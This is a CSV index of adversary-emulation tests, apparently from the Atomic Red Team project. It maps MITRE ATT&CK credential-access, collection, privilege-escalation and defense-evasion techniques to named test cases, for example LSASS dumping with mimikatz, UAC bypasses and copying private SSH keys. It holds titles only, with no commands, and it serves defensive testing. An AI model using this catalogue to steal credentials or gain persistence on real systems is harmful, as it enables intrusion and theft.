credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
collection,T1560.002,Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
privilege-escalation,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
